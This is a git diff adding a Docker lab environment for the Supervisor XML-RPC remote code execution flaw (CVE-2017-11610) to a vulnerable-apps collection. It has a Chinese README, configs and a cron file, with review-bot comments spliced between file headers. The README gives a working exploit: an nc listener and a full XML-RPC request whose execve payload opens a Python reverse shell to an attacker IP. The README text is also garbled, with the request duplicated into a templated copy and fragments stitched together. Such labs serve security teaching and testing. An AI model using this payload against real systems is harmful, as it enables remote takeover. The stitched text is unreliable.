diff --git a/README.md b/README.md
index d1dcac2..6e91f3b 100644
--- a/README.md
+++ b/README.md
@@ -114,6 +114,7 @@ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
 * [Spring Boot](./s/springboot/)
 * [Struts2](./s/struts2/)
 * [Spring WebFlow](./s/springwebflow/)
+* [Supervisor](./s/supervisor/)
 ### [W](./w/)
diff --git a/s/README.md b/s/README.md
index 8b52d62..79fa842 100644
--- a/s/README.md
+++ b/s/README.md
@@ -4,4 +4,5 @@
 * [Shiro](./shiro/)
 * [Spring Boot](./springboot/)
 * [Struts2](./struts2/)
-* [Spring WebFlow](./springwebflow/)
\ No newline at end of file
+* [Spring WebFlow](./springwebflow/)
+* [Supervisor](./supervisor/)
diff --git a/s/supervisor/1/Dockerfile b/s/supervisor/1/Dockerfile
new file mode 100644
index 0000000..32081cc
--- /dev/null
+++ b/s/supervisor/1/Dockerfile
@@ -0,0 +1,22 @@
+FROM debian:jessie
+MAINTAINER Medici.Yan@Gmail.com
+# RUN sed -i 's/deb.debian.org/mirrors.aliyun.com/g' /etc/apt/sources.list
+
+RUN set -x \
+ && apt-get update \
+ && apt-get install -y psmisc cron python python-pip \
+ && pip install --upgrade pip \
+ && pip install flask gunicorn supervisor==3.3.2 \
+ && mkdir -p /htdocs/templates
+
+COPY src/app.py /htdocs/app.py
+COPY src/index.html /htdocs/templates/index.html
+COPY src/supervisor.conf /etc/supervisor.conf
+COPY src/start.sh /start.sh
+COPY src/daemon.sh /daemon.sh
+COPY src/root /var/spool/cron/crontabs/root
+
+RUN chmod a+x /start.sh /daemon.sh \
+ && rm -rf /var/lib/apt/lists
+
+CMD ["/start.sh"]
diff --git a/s/supervisor/1/README.md b/s/supervisor/1/README.md
new file mode 100644
index 0000000..fd5d0d3
--- /dev/null
+++ b/s/supervisor/1/README.md
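Review bot: The root crontab is copied to /var/spool/cron/crontabs/root with whatever mode the checkout gave it (typically 0644, since git keeps only the executable bit), and I believe Debian's cron only loads spool crontabs that are mode 0600 — it logs an INSECURE MODE complaint and skips the file otherwise — so the scheduled /daemon.sh may never run; the final RUN in the hunk should also set `&& chmod 0600 /var/spool/cron/crontabs/root \` before the `rm -rf`. That separate `rm -rf /var/lib/apt/lists` RUN also cannot shrink the image, because the lists were already committed in the earlier apt layer; moving it to the end of the first RUN makes it effective. `MAINTAINER` is deprecated in favour of `LABEL maintainer="..."`. daemon.sh and app.py are copied here but are not part of this chunk, so their contents could not be reviewed.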
@@ -0,0 +1,98 @@ +## Supervisor Authenticated Remote Code Execution(CVE-2017-11610) + +### 漏洞信息 + +Supervisor 是用 Python 开发的一套通用的进程管理程序,能将一个普通的命令行进程变为后台 daemon,并监控进程状态,异常退出时能自动重启。Supervisor可通过web接口管理服务,在配置了web接口后,同时会在服务器启动一个 XMLRPC 服务器,端口为 9001。该接口可配置需要密码访问,或者无需认证访问。 + +在获取该接口的访问权限后,远程攻击者可发送一段精心构造的请求,可在服务器执行任意代码。 + +### 影响版本 + +已经确认: + +* Supervisor 3.1.2 <= Version <= 3.3.2 + +### 镜像信息 + +类型 | 用户名 | 密码 +:-:|:-:|:-: +http://xxx/9001/RPC2 | vulapps | vulapps + +### 获取环境: + +1. 拉取镜像到本地 + + ``` +$ docker pull medicean/vulapps:s_supervisor_1 + ``` + +2. 启动环境 + + ``` +$ docker run -d -p 80:80 -p 9001:9001 medicean/vulapps:s_supervisor_1 + ``` + > `-p 80:80` 前面的 80 代表物理机的端口,可随意指定。 + + 访问 http://127.0.0.1:80 看到 web 界面即启动成功 + +#### Exp + +反弹 Shell + +> 假定启动后的环境如下: +> +> 攻击者 IP: 192.168.2.104 +> +> 受害者 IP: 192.168.2.100 + +1. 在攻击者机器上使用 nc 监听 + + ``` + $ nc -lvp 9999 + ``` + +2. 向受害者 9001 端口发送如下报文后即可 + +``` +POST http://192.168.2.100:9001/RPC2 HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/xml +Content-Type: text/xml +Accept-Language: en-GB,en;q=0.5 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Content-Length: 638 +Host: 192.168.2.100:9001 + + +++ +Supervisor Authenticated Remote Code Execution
+
POST http://{{ host }}:9001/RPC2 HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/xml
+Content-Type: text/xml
+Accept-Language: en-GB,en;q=0.5
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Content-Length: 638
+Host: {{ host }}:9001
+
+<?xml version="1.0"?>
+<methodCall>
+<methodName>supervisor.supervisord.options.execve</methodName>
+<params>
+<param>
+<string>/usr/bin/python</string>
+</param>
+<param>
+<array>
+<data>
+<value><string>python</string></value>
+<value><string>-c</string></value>
+<value><string>import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.140",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);</string></value>
+</data>
+</array>
+</param>
+<param>
+<struct>
+</struct>
+</param>
+</params>
+</methodCall>
See more at: VulApps
+
+
+
+
+
+
+
diff --git a/s/supervisor/1/src/root b/s/supervisor/1/src/root
new file mode 100644
index 0000000..3eedb7a
--- /dev/null
+++ b/s/supervisor/1/src/root
@@ -0,0 +1,28 @@
+# DO NOT EDIT THIS FILE - edit the master and reinstall.
+# (/tmp/crontab.sDovLd/crontab installed on Thu Jul 27 13:24:42 2017)
+# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
+# Edit this file to introduce tasks to be run by cron.
+#
+# Each task to run has to be defined through a single line
+# indicating with different fields when the task will be run
+# and what command to run for the task
+#
+# To define the time you can provide concrete values for
+# minute (m), hour (h), day of month (dom), month (mon),
+# and day of week (dow) or use '*' in these fields (for 'any').#
+# Notice that tasks will be started based on the cron's system
+# daemon's notion of time and timezones.
+#
+# Output of the crontab jobs (including errors) is sent through
+# email to the user the crontab file belongs to (unless redirected).
+#
+# For example, you can run a backup of all your user accounts
+# at 5 a.m every week with:
+# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
+#
+# For more information see the manual pages of crontab(5) and cron(8)
+#
+# m h dom mon dow command
+
+*/1 * * * * /daemon.sh
+
diff --git a/s/supervisor/1/src/start.sh b/s/supervisor/1/src/start.sh
new file mode 100644
index 0000000..b686a82
--- /dev/null
+++ b/s/supervisor/1/src/start.sh
@@ -0,0 +1,4 @@
+#!/bin/bash
+/usr/sbin/cron restart
+/usr/local/bin/supervisord -c /etc/supervisor.conf
+/usr/bin/tail -f /dev/null
diff --git a/s/supervisor/1/src/supervisor.conf b/s/supervisor/1/src/supervisor.conf
new file mode 100644
index 0000000..b6ecd2d
--- /dev/null
+++ b/s/supervisor/1/src/supervisor.conf
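Review bot: `/usr/sbin/cron restart` hands a positional argument to the cron daemon binary, which has no restart subcommand — that form belongs to the init script (`service cron restart`) — so depending on the cron build it either exits with a usage message or ignores the word, and the cron-driven /daemon.sh may silently not be scheduled; `/usr/sbin/cron` (or `service cron start`) is the call that matches the Dockerfile's apt install. The script also discards the exit status of both cron and supervisord before parking on `tail -f /dev/null`, so a supervisord that fails to start (bad config, port already bound) still leaves the container running and looking healthy; at minimum `supervisord -c /etc/supervisor.conf || exit 1` would surface that in the container status.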
@@ -0,0 +1,36 @@
+[unix_http_server]
+file=/var/run/supervisor.sock ; (the path to the socket file)
+;chmod=0700 ; socket file mode (default 0700)
+;chown=nobody:nogroup ; socket file uid:gid owner
+;username=vulapps ; (default is no username (open server))
+;password=vulapps ; (default is no password (open server))
+
+[inet_http_server] ; inet (TCP) server disabled by default
+port=*:9001 ; (ip_address:port specifier, *:port for all iface)
+;username=vulapps ; (default is no username (open server))
+;password=vulapps ; (default is no password (open server))
+
+[supervisord]
+logfile=/var/log/supervisord.log ; (main log file;default $CWD/supervisord.log)
+logfile_maxbytes=50MB ; (max main logfile bytes b4 rotation;default 50MB)
+logfile_backups=10 ; (num of main logfile rotation backups;default 10)
+loglevel=info ; (log level;default info; others: debug,warn,trace)
+pidfile=/var/run/supervisord.pid ; (supervisord pidfile;default supervisord.pid)
+nodaemon=false ; (start in foreground if true;default false)
+minfds=1024 ; (min. avail startup file descriptors;default 1024)
+minprocs=200 ; (min. avail process descriptors;default 200)
+;umask=022 ; (process file creation umask;default 022)
+user=root ; (default is current user, required if root)
+
+[rpcinterface:supervisor]
+supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface
+
+[supervisorctl]
+serverurl=unix:///var/run/supervisor.sock ; use a unix:// URL for a unix socket
+;serverurl=http://*:9001 ; use an http:// url to specify an inet socket
+;username=vulapps ; should be same as http_username if set
+;password=vulapps ; should be same as http_password if set
+
+[program:web]
+command=/usr/local/bin/gunicorn app:app -b 0.0.0.0:80 --log-level info --access-logfile /var/log/access.log
+directory=/htdocs
diff --git a/s/supervisor/README.md b/s/supervisor/README.md
new file mode 100644
index 0000000..96fb16d
--- /dev/null
+++ b/s/supervisor/README.md
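Review bot: `username=` and `password=` under `[inet_http_server]` are commented out, so the XML-RPC server on `port=*:9001` accepts unauthenticated requests on every interface, which contradicts both the "Authenticated" wording of the title and the README's credential table (vulapps/vulapps). If the image is meant to model the authenticated variant, uncomment `username=vulapps` and `password=vulapps` in `[inet_http_server]` (and keep the `[supervisorctl]` pair in step if serverurl is ever switched to the http form); if an open server is the intent, the README table should say so rather than list credentials that are never checked. The stale `; inet (TCP) server disabled by default` comment on the section header is also misleading now that the section is active, so it is worth a short comment stating which variant the file deliberately configures.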
@@ -0,0 +1,4 @@
+Supervisor
+---
+
+1. [Supervisor Authenticated Remote Code Execution(CVE-2017-11610)](./1)